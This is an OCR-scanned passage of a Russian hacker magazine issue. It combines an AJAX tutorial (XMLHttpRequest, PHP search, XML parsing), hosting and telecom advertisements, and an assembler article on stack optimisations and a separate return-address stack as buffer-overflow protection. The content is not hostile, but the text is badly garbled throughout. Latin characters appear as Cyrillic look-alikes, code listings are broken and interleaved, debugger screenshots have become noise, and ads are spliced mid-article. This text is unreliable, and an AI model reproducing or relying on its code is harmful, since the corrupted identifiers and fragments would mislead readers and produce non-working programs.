ХМЬНТТР, остальные же браузеры счита- 
ют его нативным, и проблем возникнуть 
не должно. Теперь алгоритм создания 
объекта ХМЬНирВециезІ прояснен. 
Сначала определяем браузер, потом со- 
здаем объект нужным нам образом: 
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^ согііпд 



СОЗДАНИЕ ОБЪЕКТА КЛАССА 
ХМЬНТТРКЕОІІЕЗТ 




ОООСЬЕ БУССЕББ 5Т0РІЕ5 



дтаіі.сот — одна из самых популярных 
служб электронной почты. Ее интерфейс 
написан полностью в идеологии Аякса. 
Кроме того, в интерфейс интегрирован 
пейджер Ооодіе Таік. 
тарз.доодіе.сот — специальная служба 
для работы с картами, написанная на 
Аяксе. Она предоставляет открытый АРІ 
для всех желающих. 

Ооодіе Зиддезі — система предостав- 
ления подсказок по мере набора текста 
в поле ввода. 

Ооодіе ЗреІІсИеск — проверка правопи- 



Что умеет делать этот объект? Самой 
главной функциональностью для нас 
будет возможность отправлять запросы на 
сервер и обрабатывать ответы в асинхрон- 
ном режиме. Нам придется использовать 
метод установки параметров соединения 
ореп и метод отправки запроса зепсі. 

Также мы будем задействовать свойство 
опгеасІузІаіесНапде для установки обработ- 
чика получения ответа на запрос. Полный 
список свойств и методов ХМІЛирНецііезІ, 
можно посмотреть в таблицах «Методы 
класса ХМШПрРециезЬ и «Свойства клас- 
са ХМШйрНедиезІ». 

Теперь, я думаю, ты достаточно осве- 
домлен и готов писать метод отправки 
запроса. В качестве параметров мы будем 
передавать ему адрес, на который идет 
запрос (я назвал этот параметр «ТМе» , так 
как использовал относительные адреса), 
идентификатор НТМБ-элемента — _гезиШсІ, 
в котором будем отображать результат, 
и обработчик ответа на данный запрос 
— деШециез^Ргос. Реализация проста, как 
арбуз: определяем параметры соединения, 
устанавливаем обработчик и посылаем 
запрос с пустым телом на сервер. 

МЕТОД ОТПРАВКИ ЗАПРОСА НА СЕРВЕР 



Скажи миру «Привет» 

Раз библиотека готова, можно попробовать 
ее использовать. Вначале скажем миру «При- 
вет», а затем модернизируем приложение для 
работы с динамическими табами (вкладками). 

«ПРИВЕТ, МИР!» НА АЯКСЕ 



<Ы:т1>1 



<НеасІ> 



<біб1е>Привет, мир АЯАХ'а </біб1е>| 



<зсгірб 1апдиаде="Цаѵа5сгірб» 



|5гс='^ах.з5" буре="бехб7Д 

раѵазс гірб м ></5сгірб>^[ 

■вВЫ 

<Ьосіу> 



- Л* ь 




. \ ■> 









<а Нгеб="#" опс1іск='Наѵазсгірб: 



зепбКедиезб ( 'Неііо.бхб', 'гезиіі:'. 



Типсбіоп зепбКедиезб (Іііе, _гези1б1б. 



дебКедиезб) ; "Жликни по мне, чтобы 



дебКедиезбРгос) { 



отправить запрос 



</а>| 



гезиібісі = гези1б1б;1 



босшпепб .дебЕІетепбВуІсІ 



(гезиібіб) . іппегНТМЬ = 'Подождите, 



идет загрузка.. 



<р іб="гези11:">3десь будет результат | 
запроса </р>и 



НббрКедиезб.ореп ('деб', П1е);[ 



НббрКедиезб.опгеабузбабесНапде = 



</Ьобу>| 

</]пбт1>1 



дебКедиезбРгос;! 



Посмотрим, что мы с тобой наколдовали. 
У нас есть линк, при щелчке на который 
на сервер отправляется запрос к файлу 
НеІІоЧхб Поскольку іхі-файл не является 
скриптом, сервер просто передаст его 
содержимое, которое мы и выведем для 
пользователя. Как видишь, программи- 
рование на стороне сервера пока даже 
не применялось, но и из такой простоты 
можно выжать интересные вещи. Напри- 
мер, сделать страницу с несколькими 
вкладками: 

СТРАНИЦА С ВКЛАДКАМИ 

|<а Пгеб="#" опс1іск='Наѵазсгірб: Щ 

ІзепбКедиезб ('І.НбтІ', 'гезиіб', I 
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ЯШИ 

> Использование 
Аякса сильно повы- 
шает интерактивность 
сайта. При работе 
по принципам Аякса 
следует уделять 
особое внимание 
безопасности, ведь 
пользователь видит 
твой клиентский код. 

Генерация НТМІ_ 
на стороне клиента 
позволяет быстрее за- 
гружаться страницам. 



> На нашем РѴР тебя 
ждет сюрприз! 

ыыы 






л 



> ѵѵѵѵѵѵ.бІі1тІаообіез. 
сот — библиотека го- 
товых скриптов АЗАХ 
и ОНТМІ_. 
ѵѵѵѵѵѵ.ѵѵЗ.огд/ТРі/ 
ХМШДрРедиезі 
— черновой вариант 
стандарта объекта 
ХМШДрВедиезГ 



огд/ѵѵікі/А]ах — статья 
про Аякс в Википедии. 
Очень рекомендую так- 
же посмотреть 
английский вариант. 



сот/ѵѵеЫюоІкіІ: 

— библиотека для 
АЗАХ-приложений от 
Ооодіе. 

ѵѵѵѵѵѵ.хаіахргоіесГога 

— еще одна библио- 
тека для связки АЗАХ 
и РНР. 



пеі — фреймворк для 
разработки ЗаѵаЗсгірГ 
приложений. 




Как видишь, ссылок теперь 3, и загружают они разные 
НТМІ_-файлы. В результате получилась страничка с ди- 
намически изменяемым содержанием. 

Серверная часть 

Набаловавшись вдоволь с обычными страничками, 
посмотрим, что можно сделать с помощью скриптов на 
стороне сервера. Писать будем на самом распространен- 
ном у нас языке для веба — РНР. Сначала повторим наш 
успехи скажем «Привет». Действия полностью аналогич- 
ны предыдущим, но только запрос адресуется на скрипт: 

СТРАНИЦА С АЛАХ- ССЫЛКОЙ НА РНР-ФАЙЛ 



<а ]тгеР= м # м опс1іск="заѵазсгір1і: зепбКедиезб 



( 'НеІІо.рНр', 'гезиІбС дебКедиезб) ; "Жликни по 



мне, чтобы отправить запрос </а>1 



|<Р ігі=" гези1б">3десь будет результат запроса | 
|/Р>І 

А РНР-файл должен просто что-то выводить: 



РНР-ФАЙЛ С 


ПРИВЕТСТВИЕМ 


<? рНр есНо 


"Этот пример реализован связкой | 


АЛАХ + РНР! " 


?>■ 



Сверхдинамичный поиск 

Теперь мы вооружились до зубов и можем написать 
настоящее АМХ-приложение. В качестве не очень 
сложного примера я предложу «сверхдинамичный 
поиск», который был подсмотрен мной в одном из 
фреймворков на РуіИоп. Идея такая: имеется форма 
поиска, пользователь вводит в ней букву за буквой 
искомого слова, и после каждого нажатия на клавишу 
формируются результаты. Попробую проиллюстриро- 
вать. Пользователь вводит букву «X» — на экране авто- 
матически выводятся ссылки на все статьи, в которых 
эта буква встречается. Затем он вводит «а», и поиск 
ведется уже по сочетанию «Ха». И так далее. Реализа- 
цию начнем с НТМІ_-видами нашего проекта: 

НТМЪ- ФОРМА ДЛЯ СВЕРХДИНАМИЧНОГО ПОИСКА 

<НГт1> 

<Неасі> 



мфІДОп П'гігя 



1 и ■> ш гт»п-» 

ІйѵБы скіл икщши ігі-^нітів миш. іи-? и п^тпиэк'пкчвс зып 

2 Киі Шр ІММ4МГМЛ ТчГ* 

•кбігѵ ы^ігхтъ пев ЬфЬ-н” ^игтпін ■ ■ ■і Іі рт І лЖМц гтуипт,- ■ ■ лДлХ Ч.тъ 
нярл н 'Мті цкн, *^+кт ктт+нГм ты*} В*р;я*«>чщн™*м}»г ■■-■«ат 

*с<! Д-Кеі I ^Сі^лііН т+лгні Сгцрп^іі ЗЬмілё Ь#»ттз- ЕіфЫпі 

ідаіііш і р іч* Дейл й*%т»*Мрясдвй.ХМиПТ?'. 

■і іодвды счіеійю ньгііиим и «^ЛЕНи^ыкнуп и ем Т-трь «дг^ѵяі-и 

ілліпі«$ипткіі ѵрекнп, :апиі і^'ыглв , к Е-р-хпгт-. г:- с : я 

<*МИ-К Ф*М«Т ДО РЫМ НИ іГці I II 



> Поиск на Аяксе в действии 



<шеба Н1:1:р-едиіѵ= м Соп1:еп1:-Туре" сопбеп1:= м 



Ь±т1; сНагзе1:=и1:Г-8"/> 



<Гі1:1е>Привет, мир АЛАХ'а </Гі1:1е> 



<зсгірб 1апдиаде="ЛаѵаЗсгірб" згс="азах.; 
буре="бех1:/заѵазс г ірб ,,>< /зс г ірб > | 



<зсгір1: 1апдиаде= м ЛаѵаЗсгірб" буре= м 



щІ аѵазсгірб">1 



|Гипсбіоп зепбЗеагсНКедиезбО {Д 

зепбКедиезЩ 'зеагс]гі.р]гір?д=' + босипюп±7Д 
ІдебЕ1ешепбВуІб( 'зеагсНОиегу' ) .ѵаіие, 'гезиіб' 



дебКедиезб) ; 




А8АХ (АзупсНгопоиз 8аѵаЗсгірі апб ХМІ_ — 
«Асинхронный баѵаЗсгір! и ХМІ_») — это не ка- 
кая-то отдельная технология или язык, это при- 
нцип разработки интерактивных веб-страниц 
(иногда употребляют термин «сверхинтерак- 
тивные» страницы). Датой рождения этой мето- 
дологии принято считать 1 8 февраля 2005 года 
— день выхода в свет статьи Джесси Джеймса 
Г арретта «Новый подход к веб-приложениям». 
Как мы видим, технология довольно молодая 
(современная), и в полной мере ее смогли ос- 
воить не многие сайты. 

Впервые этот принцип начала активно ис- 
пользовать одна небольшая компания из Ред- 
монда, реализовав в своем новом браузере 
ХМи-ШрВецііезІ: для работы с веб-версией 
Оиііоок. Затем последовали реализации в бра- 
узерах МогіІІа и Арріе Заіагі. Сейчас техноло- 
гия А8АХ применяется на самых разных сайтах, 
особенно в этом усердствует компания Ооодіе, 
которая использует эту технологию в значи- 
тельной части сервисов. 
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В этом случае мы не только подключили файл щах.із, но и на- 
писали дополнительный скрипт, который будет срабатывать 
при нажатии на кнопку в поле ввода. Его работа будет очень 
простой — он будет передавать строку для поиска, которая 
берется из поля ввода, в виде параметра для скрипта РНР. 
Теперь очередь РНР'шного скрипта. Для простоты я завел мас- 
сив $радез, который у меня представляет собой содержимое 
страниц сайта. Он обычно загружается из базы данных, либо 
поиск производится средствами БД, что, конечно, правильнее, 
так как скорость на порядок выше. 

После того как в $радез помещено содержимое страниц, необ- 
ходимо получить значение параметра ц из запроса, переданно- 
го клиентским скриптом, и если запрос не пустой, пробежаться 
по массиву $радез и вывести содержимое страниц, которые 
содержат строку для поиска. 



Что такое размещение сервера (со-Іосаііоп) ? 
Со-Іосаііоп — это размещение Вашего сервера на 
площадке (в дата-центре) провайдера, в 19” стойке 
(гаек). Услуги по размещению сервера (соііосаііоп), 
включают наличие основного и резервного электро- 
питания, контроля температурно-влажностного 
режима, системы автоматического газового пожаро- 
тушения, ограничение доступа к Вашему оборудова- 
нию, наличие быстрых основного и резервного 
интренет-каналов, сохранность Ваших серверов, 
и опционально — услуги по администрированию 
серверов. 

Вам либо будет предоставлен в аренду Интернет- 
канал гарантированной пропускной способности, 
либо будет предложено оплачивать трафик, при 
некоторых условиях трафик может быть бесплатный. 

Почему размещать оборудование у нас? 

— Мы размещаем оборудования в двух дата-центрах 
в Москве: дата-центре М9 и дата-центре СТЕК; 



ЭМУЛЯЦИЯ ПОИСКА по сайту с выдачей результатов 



<? ріір 




// Массив с содержимым страниц сайта 


$радез = аггау (...) ; 




$диегу = $ СЕТ [ ' д' 


] ; 




А где жеХМІ_? 

Хочу ХМІ_! Почему мы текст какой-то передаем, обеща- 
ли же ХМІ_? Вообще, если посмотреть на название объекта 
ХМЦЧЦрРедиезЦ то может показаться, что он создан только 
для передачи ХМІ_-данных. На буржуйских форумах и блогах, 



— Мы обеспечиваем круглосуточный мониторинг 
работоспособности Ваших серверов; 

— Мы обеспечиваем Вам доступ к оборудованию по 
предварительной заявке; 

— Мы предоставляем подключение на скорости от 
ІООтЬрз до ІѲЬрз; 

— Мы окажем Вам помощь в решении проблем. 



Какие преимущества услуги размещения сервера? 

Услуги по размещению серверов в дата-центрах 
включают множество преимуществ для владельцев 
сайтов, таких, как: 

— Полный контроль над серверами; 

— Для серверов специальные условия хранения 
и функционирования; 

— Серверы настолько быстры и производительны, 
как вы захотите, вы можете обновлять серверы; 

— Уменьшенная зависимость от услуг провайдеров, 
большинство задач администрирования и настроек 
можно проводить удаленно, значительная гибкость; 

— Возможность использовать имеющиеся серверы; 

— Построение собственных отказоустойчивых 
решений. 




тел. (495) 788-94-84 
ѵѵѵѵѵѵ.ЬеБЪИозДпд.ги 
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информацию в отформатированном виде. 
Сделать это очень просто с помощью объек- 
тов, встроенных в ^ѵаЗсгірі: 

ПОЛУЧЕНИЕ И ОБРАБОТКА ИНФОРМАЦИИ 
О БАНКЕ 




опгеа сіуз іаіесііапде 



геабуЗіаІе 



гезропзеТехі 

гезропзеХМІ. 




Обработчик события, которое 
происходит при каждой смене 
состояния объекта. 

Возвращает текущее состояние 
объекта (0 — неинициализирован, 1 — 
открыт, 2 — отправка данных, 3 — получе- 
ние данных и 4 — данные загружены). 
Текст ответа на запрос. 

Текст ответа на запрос в виде ХМІ_, 
который затем может быть распарсен 
посредством ООМ. 

Возвращает НТТР-статус в виде числа 
(404 — «Ыоі Роипб», 200 — «ОК» и т.д.). 
Возвращает статус в виде строки («N01 
Роипб», «ОК» и т.д.). 




Если ты заметил, здесь в основном ис- 
пользуются свойства и методы объекта 
гезропзеХМЦ который представляет собой 
ответ сервера на запрос в виде ХМІ_. 

С ним довольно удобно работать, так как все 
необходимые функции встроены. Сама же 
ссылка будет выглядеть так: 

ВЫЗОВ ФУНКЦИИ СЕТХМЪКЕОНЕЗТ В КА- 
ЧЕСТВЕ ПАРАМЕТРА 



1<а НгеТ="# м опс1іск=" ^ аѵазсгірк : 



ІзепсіК.едиез1: ( ' 1 . хті ', ' гезиН ' 



декХтІКедиезк ) ; "Жликни по мне. 



чтобы отправить запрос </а>1 



однако, часто выражается мнение, что 
это просто дань моде и можно использо- 
вать другие форматы — от чистого текста 
и РІТМІ_ до текста на ^ѵаЗсгірі. Ріо есть 
один существенный факт: при передаче 
данных в виде ХМІ_, они занимают меньше 
места и быстрее грузятся. 

Разберем такой пример. Есть ХМБ-файл 
(возможно генерящийся скриптом), кото- 
рый содержит название и адрес некого 
банка :). 



ИНФОРМАЦИЯ О БАНКЕ В ВИДЕ ХМЪ 



<? хті ѵегзіоп=" 1 . О " епсоб1пд='Ч1ТЕ-1 



8» зЪапба1опе= м уез»?>| 



<Ьапк>| 



<Ьапк_паше>Банк Васи Пупкина </Ьапк | 



<Ьапк_аббгезз>ул . Ленинградская, 



57</Ьапк_аббгезз>| 



</Ьапк>| 



Его надо получить, распарсить и вывести 



Важно отметить, что в качестве параметра 
передается функция деіХтІВедиезі, кото- 
рую мы написали. 

Это еще не конец 

В этой статье нам удалось не только разо- 
брать основы АЛАХ, но и копнуть гораздо 
глубже. Хотелось, чтобы ты использовал 
АЛАХ в веб-строительстве на своих стра- 
ничках для придания им большей динамики 
и юзабильности, а уж на наше содействие 
в этом вопросе можешь рассчитывать :)□□. 
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Так же как на любую бочку меда всегда найдется ложка дегтя, 
любая технология всегда имеет не только плюсы, но и минусы. 
Ниже я перечислю наиболее существенные недостатки А^Х 
и опишу возможные методы их устранения. 

□ Поисковая оптимизация 

По моему мнению, главной проблемой страниц на Аяксе являет- 
ся их «невкусность» для поисковиков, поэтому такие страницы 
очень плохо ими «съедаются», ведь поисковик не умеет перехо- 
дить по ссылкам ^ѵаЗсгірі. Огромное количество пользова- 
телей могут пройти мимо твоего сайта, даже если на нем есть 
требуемый контент. Следовательно, его нужно сделать доступ- 
ным другим способом, хотя бы самым банальным — смастерить 
страничку «Карта сайта» с полным списком страниц. 

О Кроссбраузерность 

У пользователей есть плохое качество — они пользуются 
разными браузерами. Казалось бы, нет проблем — пиши код 
на НТМІ_, СЗЗ и ^ѵаЗсгірі, который соответствует стандартам, 
и все. Но не тут-то было — разные браузеры поддерживают 
стандарты неодинаково. Что ж, ставим себе несколько самых 
популярных браузеров (причем необходимо поставить еще 
и их разнообразные версии) и тестируем наши веб-странички. 

О Пользователи без АМХ 

Ты будешь смеяться, но есть странные типы (я, например), 
у которых ^ѵаЗсгірІ работает только для определенных сайтов, 
а для других отключен, или у которых нестандартный браузер, 
незнающий про А^Х. Как же им быть? Обязательно сделай аль- 
тернативную НТМІ_-версию страницы, бери пример с атаіі.сот ! 

□ Кнопка «Назад» 

Поданным исследователей, кнопка браузера «Назад» являет- 
ся вторым по популярности средством навигации после пере- 
хода по ссылке. То есть пользователь всегда рассчитывает на 
возможность вернуться на одну страницу назад. Веб-странич- 
ки, которые созданы с использованием Аякса, такую возмож- 
ность не поддерживают, потому что их содержание создается 
«налету». Чтобы как-то это исправить, можно запрограммиро- 
вать соответствующую логику на ^ѵаЗсгір! и сделать ссылку 
«Назад», щелчок на которую позволит пользователю перейти 
на предыдущую страницу. Второй вариант, более универсаль- 
ный и чаще всего легче реализуемый, — использовать невиди- 
мый ІРВАМЕ, который будет накапливать историю переходов. 

□ Избранное 

Твоя страничка на Аяксе настолько понравилась посети- 
телю сайта, что он решил кинуть ее в «Избранное» (или 
в «Закладки», если посетитель — лисовод). Но у него ничего 
не получится, так каку группы страничек на Аяксе всегда 
адрес первой из них. Справиться с проблемой опять же можно 
двумя способами: программингом и хаком. Программерское 
решение заключается в том, чтобы каждая сгенерированная 
страница имела свой адрес и ссылку «Добавить в Избранное», 
которая будет реализовывать нужную логику. Второй способ 
— использовать ссылку на подраздел, который идет в адресе 
страницы после знака диеза «#». Дело в том, что с помощью 
^ѵаЗсгір! эту часть адреса можно изменять. Таким образом, 
этот хак может частично решить и проблему кнопки «Назад». 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



-Подключение - в іінбйм месте МОСкЬы И МОСКОВСКОЙ обя. 



«Срок подключения в Москве - 14 дней, 
в Московской об л . - от 14 до 30 дней. 



«Установка прямого московского телефонного номера 



-Многоканальные телефонные номера 



ЧР-ге лефоння 



«Выделенные линии Интернет 



«Корпоративные частные сети (ѴРН) 



"Хостинг, услуги О а Ія — центра 



РМ Телеком 
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АССЕМБЛЕРНЫЕ 



НАТЯГИВАЕМ СТЕК ПО-ХАКЕРСКИ 

АССЕМБЛЕР ПРЕДОСТАВЛЯЕТ ПРАКТИЧЕСКИ НЕОГРАНИЧЕННУЮ СВОБОДУ ДЛЯ САМОВЫРАЖЕНИЯ И ВСЕВОЗМОЖНЫХ ИЗВРА- 
ЩЕНИЙ, ЧТО ВЫГОДНО ОТЛИЧАЕТ ЕГО ОТ ЯЗЫКОВ ВЫСОКОГО УРОВНЯ. ВОТ МЫ И ВОСПОЛЬЗУЕМСЯ ЭТОЙ возможностью, 
ИЗВРАТИВШИСЬ НЕ ПО-ДЕТСКИ И СОТВОРИВ СО СТЕКОМ ТО, О ЧЕМ ПРИПЛЮСНУТЫЙ СИ ТОЛЬКО МЕЧТАЕТ. 



ОТурбопередача стековых аргументов 

ѳрѳдачу аргументов через стек 
можно существенно уско- 
рить, в случае если аргументы 
представляют собой константу, 
известную еще на стадии трансляции. Клас- 
сический способ передачи выглядит так: 

КЛАССИЧЕСКИЙ СПОСОБ ПЕРЕДАЧИ СТЕКОВЫХ 
АРГУМЕНТОВ 



ризА 


000000669 


ризА 


000000999 


ризА 


000000696 


і — 1 
і — 1 

3 


000000666 



Довольно расточительное (в плане процес- 
сорных тактов) решение, особенно если 
функция вызывается многократно. При этом 
операнды команды РЫЗН перегоняются из 
секции Тех! (находящейся в кодовой кэш- 
памяти первого уровня) в область стека, на- 
ходящуюся в кэш-памяти данных. Ну и зачем 



гонять их туда и обратно, когда аргументы 
можно использовать непосредственно по 
месту хранения? 

Усовершенствованный пример выглядиттак: 



. соі|§ 




моѵ 


ЕВР , ЕЗР 



МОѴ 


ЕЗР 


, оГГзеГ Гипс агд + 4 


САБЕ 


ту 


Гипс 


МОѴ 


ЕЗР 


, ЕВР 



. ба|§| 




Гипс агдОО 00А, 


696А, 999А, 669А 



И хотя размер кода после оптимизации не 
только не сократился, но даже увеличился 
(14Н байт до оптимизации и 1ЕН — после), мы 
сохранили немного стековой памяти и сокра- 
тили время выполнения. Причем чем больше 
аргументов передается функции, тем в более 
выигрышном положении оказывается опти- 
мизированный вариант, поскольку неопти- 



мизированный вынужден тратить на каждый 
аргумент один дополнительный байт! 



8ВЕС 


тоѵ еЪр, езр 


ВС66000000 


тоѵ езр, 000000013 


Е80Е000000 


саіі 000000666 


8ВЕ5 


тоѵ езр, еЪр 


... 


о 

о 

о 

о 

о 

о 

о 

о 


96 06 00 00? 99 09 00 00 69 


06 00 00 



Несколько замечаний по поводу. Первое. 
Операционные системы семейства 
ѴѴіпбоѵѵз ІЧТ (к которым принадлежат 
ѴѴіпбоѵѵз 2000, ѴѴіпбоѵѵз ХР, ѴѴіпбоѵѵз Ѵізіа, 
ѴѴіпбоѵѵз Зегѵег 2003 и ѴѴіпбоѵѵз Зегѵег 
ЬопдИогп) гарантируют целостность содер- 
жимого стека выше его вершины (для адре- 
сов меньших, чем ЕЗР), поэтому переносят 
такие извращения безо всякого ущерба для 
работоспособности программы. Опера- 
ционные системы семейства ѴѴіпбоѵѵз 9х 
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ИЗВРАЩЕНИЯ 



вѳдутсѳбя иначе, бесцеремонно исполь- 
зуя все, что находится выше ЕЗР в целях 
«производственной необходимости», что 
ведет к искажению секции данных и после- 
дующему краху программы. Поэтому все, 
что было сказано здесь, распространяется 
только на ЫТ. 

Замечание номер два. Перед аргумента- 
ми необходимо оставить двойное слово 
(а в 64-битном режиме — четвертное) для 
сохранения адреса возврата. При этом 
секция данных, где находится это слово, 
должна быть доступна на запись. Если же 
функция вызывается из одного единствен- 
ного места и адрес возврата известен 
заранее, ничего не мешает положить его 
рядом с аргументами. Но тогда функцию 
придется пускать командой фтр, а не саІІ, 
что еще больше увеличивает 
производительность: 

ВЫЗОВ ФУНКЦИИ С ПРЕДОПРЕДЕЛЕННЫМ АД- 
РЕСОМ ВОЗВРАТА КОМАНДОЙ ЦМР 

. собе 

МОѴ ЕВР, ЕЗР 

МОѴ ЕЗР, оТЕзеН Еипс_агд + 4 
НМР шу_Еипс 



Ьеге: 

МОѴ ЕЗР, ЕВР 

ИИ 

Еипс_агдОО оЕЕзеЕ Неге, 696 Н, 999Н, 

НИ 

Кстати говоря, ни адрес возврата, ни аргу- 
менты функции вовсе не обязаны быть конс- 
тантами, известными на стадии компиляции, 
и они могут свободно модифицироваться 
в любой момент командами МОѴ и ЗТ05. 
Также если аргументы хранятся в локаль- 
ных переменных, то засылать их в стек 
необязательно! Достаточно лишь скор- 
ректировать регистр ЕЗР таким образом, 
чтобы переменные-аргументы оказались на 
вершине. Естественно, порядок размеще- 
ния аргументов в памяти должен совпадать 
с порядком передачи аргументов, но на 
ассемблере, в отличие от языков высокого 
уровня, мы можем самостоятельно выбирать 
нужную схему размещения переменных, так 
что это не проблема. 

Еще одна тонкость: «оптимизированный» 
вариант обладает всеми формальными 
атрибутами «передачи по значению», но 



де-факто аргументы передаются по ссылке. 
То есть совсем наоборот! Аргументы пере- 
даются по значению, но это значение после 
выхода из функции сохраняет свое состоя- 
ние, ведет себя так, как будто бы оно было 
передано по ссылке. Иногда это экономит 
такты процессора и сокращает потребнос- 
ти в памяти, но иногда ведет к трудноуло- 
вимым ошибкам, лишний раз подтверждая 
тезис, что нет в мире совершенства. 

И последнее: при всех этих играх со стеком 
следует помнить, что целый ряд АРІ-функций 
требует, чтобы указатель стека был выров- 
нен на границу четырех байтов. Нарушение 
этого правила ведет к непредсказуемым 
последствиям. 

О Повторное использование кадра стека 

При входе внутрь функции большое ко- 
личество локальных переменных инициа- 
лизируется константами или значениями, 
инвариантными по отношению к самой 
функции (то есть другими переменными, 
чаще всего глобальными). Причем инициа- 
лизация обычно осуществляется командой 
МОѴ, а для обслуживания строковых пере- 
менных приходится прибегать к 



/ 141 



ХАКЕР 12/96/ 06 




^ согііпд 






^Ъ^і Йр| .ѵн ^У— Цй|р 

в)«):х| ►)п| МИІ ІІІІІІ ^) 1ІІ і*І к I м| т |иѵ| н| с| / |к|в| к| »«.| і 1 ЛЗ^І 



1 І^ЙЕ-ЙІ. 



"НШ1 



н 



1 айьенші 


г$ МЕ5 іт СВР.ЕЗР 


1 




1 ПП401ПП? 


т ВС ал?04ппи нот Е$мр*інізе-0В4Ц?0РІ 






1 й й40і й й 


, Ей ийпвѵаип СРІЕ ирІ1ііК^бй40і01& 




ЕСЯ 0П00И1П1 


1 0 0401 П ПС 


. ВДЕС НОУ Е5Р.ЕІР 




Е0Х ГТГГГГТГ 


1 и 11401 и иь 


* й-п пп Ру$« й 


гЁКІІЙПЕІГ ■ У 


ЕВК ЛгрЮГУОО 


1 й имги й 1 1I 


в., ЕЕ 15 :][ІЭГ|ЛІІ.І <жі тт РТЙ ВВ:[ <6КЕ0Ж1.К.ЕхИР™се 


ФехііГгк*» 1 


Е$Р 00402 та п оргіпігг-.00мп?00в 


ЯЕТН 


ЕВР 00041 Г СЛ 


II мыши? 






Е5І УПП0ВВПП 


ОП40Ю1В 


00 




Ейі 0йй00Уйй 


ПП4И1 014 


00 






а 0401 от 


00 




ЕЕР 0П40101& арігііііг* .004 01014 


пп40іпш 


00 




С 0 ЕВ 0023 32Ы( 0(ггтгт 


II 1140 1 II 1 0 


00 




р і ев 001 В эгьіі крргггррг) 


й 0^01 й 1 й 


00 




л 0 55 нгсгз агьіі ве^і-іімі-і) 


II 11401 П 1 И 


00 




2 1 [:-і 0020 ШІ 0(ГГГГГГГГ> 


ии4иі и и 


00 




5 0 Г5 ипав тй 7 грирпм(і=гг) 


ПП401 П?0 


00 




і і ев ввоо мн.і_ 


II N401 II? 1 


00 




У 0 


00401022 


00 




а в шіЕгг І.КВУН ЗіёСёЗВ 10ВМН00ВІЦ 


П 11401 П?!Т 






“ 


и ІІ4И і и?4 


00 




С Г и 0П000?4« ( НО р НН , Г , Р С , М5- ,РГ , ВЕ *ее ) 


ПП4Й1П?5 


00 




5ТІ гяріу 0.0 


II N40 1 и?4 


Е 


,;Т1 


■ іиі4в?ии*і 




004В1ІІ0С НН МИК Іп арі Іпі гг _ СІЪИіД 
^^^^^■ 00402004 0000049 й 



ао^е^аіе ей ее ао ее 
&и4й?прй аа ля пи яв 
Вй 



йй402йй0 



п п^й? плл ее яе пп ее 



ов ее ее ей 
пя вв яя вп 



пп ее яе »п 



ее йй ее ее 
яв ая вв яя 



ее пп ее яя 



еа ее ай ее 
вв яв ая вв 
ев ее ии вв 
еп яе пп ее 



I 004ПР00Я 

I йен иу иео 
I пяпе?пів 
I МОМ №7 мі 4 



I 



> Передача стековых аргументов напрямую, без их фактической засылки в стек 



ВЕР МОѴЗВ. Все это медленно, громоздко 
и непроизводительно. 

А почему бы не подготовить кадр стека еще на 
стадии трансляции?! В грубом приближении 
это будет выглядеть так: 

ВЫЗОВ ФУНКЦИИ С ЗАРАНЕЕ ПОДГОТОВ- 
ЛЕННЫМИ АРГУМЕНТАМИ И ЛОКАЛВНЫМИ 
ПЕРЕМЕННЫМИ 
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В некоторых случаях достигается просто 
колоссальное ускорение, однако тут есть 
один подводный камень — при повторном 
вызове функции все «инициализиро- 
ванные» переменные сохраняют свои 
текущие значения и наступает полный 
облом. Фактически мы добились того, что 
превратили локальные стековые перемен- 
ные в статические! Бесспорно, иногда это 
очень хорошо, но в 90% случаев нам нужно 
совсем другое. Вот и устроим себе это дру- 
гое с помощью РЕР МОѴЗ! Подготавливаем 
инициализированные локальные пере- 
менные на стадии создания ассемблерной 
программы, а затем копируем их в кадр 
функции при его открытии. Это намного 
быстрее, чем инициализировать каждую 
локальную переменную по отдельности 
командой МОѴ. 

К тому же кадры некоторых функций доста- 
точно схожи между собой, что позволяет 
объединить несколько кадров в один! 
Достаточно сказать, что каждая функция 
нуждается в переменных, инициализиро- 
ванных нулями. Чтобы не делать много раз 
один и тот же МОѴ [ЕВР+ХХН], 0, лучше 
(и быстрее) выполнить РЕР ЗТОЗ! 

Вот в чем истинная сила ассемблера! Вот 
извращения, не доступные языкам высокого 



уровня, но. . . самые зверские издевательства 
еще впереди!!! 

□ Защита адреса возврата от переполнения 

Проблема переполняющихся буферов 
породила огромное количество червей, 
открыв безграничный простор для хакерских 
атак. Но, несмотря на все ухищрения, пред- 
принятые как со стороны производителей 
компиляторов, так и со стороны разработ- 
чиков операционных систем, она остается 
нерешенной и по сей день. 

Ассемблер предоставляет по меньшей мере 
2 надежных механизма, до которых компиля- 
торы еще не «додумались». Первый и самый 
простой — это 2 стека: один для хранения 
адресов возврата, другой для передачи 
аргументов и локальных переменных. Кстати 
говоря, существуют процессорные архитек- 
туры, в которых этот механизм реализован 
изначально. Но х86-семейство к ним, увы, не 
относится, поэтому приходится брать в лапы 
напильники точить. 

Для организации двух раздельных стеков 
нам требуется всего лишь 1 дополнительный 
регистр (который можно выделить из пула 
регистров общего назначения). Пусть это 
будет регистр ЕВР, указывающий на стек 
с локальными переменными. Собственно 
говоря, неправильно называть его стеком, 
поскольку в операционных системах семейс- 
тва ѴѴіпбоѵѵз стек представляет собой особый 
регион памяти, подпираемый сверху стороже- 
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вой страницей раде-диагсі. Мы же разместим 
свой стек в памяти, полученной функцией 
ѴігіиаІАІІос, или, если хочется оптимизации, в 
.ВЗЗ-секции РЕ-файла, выделение которой 
обходится очень дешево (в плане машинного 
времени). Но это все детали реализации. 
Будем считать, что ЕЗР указывает на нормаль- 
ный стек, а ЕВР — на рукотворный. Как тогда 
будет происходить вызов функций и передача 
аргументов? 

А вот так: 

; // подготовительные операции 
МОѴ ЕВР, [XXX] 

; XXX — указатель на рукотворный стек 
МОѴ ЕЗР, ЕЗР 

; // передача аргументов функции 
МОѴ [ЕВР+ООД] , агд_а 

МОѴ [ЕВР+04Д] , агд_Ь 

МОѴ [ЕВР+08Д] , агд_с 

// вызов самой функции 
САЪЬ Ешіс 

I 

;// реализация самой функции 
Ешіс : 

АББ ЕВР, 1оса1_ѵаг_зІ2е 
; резервируем память под локальные 
переменные 

МОѴ ЕСХ, [ЕВР-1оса1_ѵаг_5І2е+041т] 

; загрузка аргумента агд_Ь в регистр 
ЕСХ 

МОѴ ЕЗІ, [ЕВР-1оса1_ѵаг_зІ2е+081і] 

; загрузка аргумента агд_с в регистр 
ЕЗІ 

